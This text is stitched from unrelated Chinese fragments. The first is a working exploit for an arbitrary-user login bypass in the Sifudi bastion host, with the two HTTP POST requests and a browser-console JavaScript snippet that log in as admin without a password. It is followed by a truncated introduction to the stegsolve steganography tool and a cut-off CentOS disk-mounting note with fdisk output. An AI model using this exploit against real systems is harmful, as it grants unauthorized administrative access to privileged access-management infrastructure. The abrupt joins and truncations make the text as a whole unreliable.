思福迪堡垒机任意⽤户登录漏洞
思福迪堡垒机存在任意⽤户登录漏洞,恶意攻击者可以绕过堡垒机的密码登录验证机制,以任
意⽤户身份随意登录堡垒机Web管理界⾯,并可以正常的使⽤账户权限去操作。
漏洞详情
注:以下操作需要在浏览器环境下,⽽不是Burp
1.获取INFO字段(注:u1参数值为⽤户名)
POST /bhost/set_session HTTP/1.1
Host: xxx.xxx.xxx.xx
u1=admin&m1=获得: {"result":true,"info":"1562205376847","ErrMsg":""}
2.带⼊INFO字段进⼊如下请求的 a0 参数值中(注:uCode参数值为⽤户名)
POST /bhost/login_link HTTP/1.1
Host: xxx.xxx.xxx.xxx
a0=1562205376847&a1=&a10=2019-01-
01+10:10:10&ha=CADFDF26E649FB6284D2FD424BD294B6&uCode=admin&vdcode=3.就可以进⼊个⼈中⼼了
F12 Console简单操作
document.getElementById("uCode").value="admin";set_session();document.getElementsB
yName("frm")[0][2].value="2019-01-01 10:10:10";document.getElementsByName("frm") [0].submit();登录成功:
stegsolve的使用及案例
0X01 stegsolve简介
stegsolve是CTF中一款常用的做图片隐写的利器,stegsolve下载地址:http://www.caesum.com/handbook/Stegsolve.jar
stegsolve安装配置:配置好Java环境变量(就是需要安装Java,然后配环境变量,具体的配置过程上网一搜一堆,这里就不赘述)
配置好环境之后直接打开就可以使用
stegsolve功能简介:
centos挂载磁盘
查看磁盘信息
[root@localhost ~]# fdisk -l
Disk /dev/vda: 85.9 GB, 85899345920 bytes
16 heads, 63 sectors/track, 166440 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x0009345c
Device Boot Start End Blocks Id System
/dev/vda1 * 3 1018 512000 83 Linux
Partition 1 does not end on cylinder boundary.
/dev/vda2 1018 166441 83373056 8e Linux LVM
Partition 2 does not end on cylinder boundary.
Disk /dev/vdb: 536.9 GB, 536870912000 bytes
16 heads, 63 sectors/track, 1040253 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disk identifier: 0x00000000有一块500G的盘还未挂载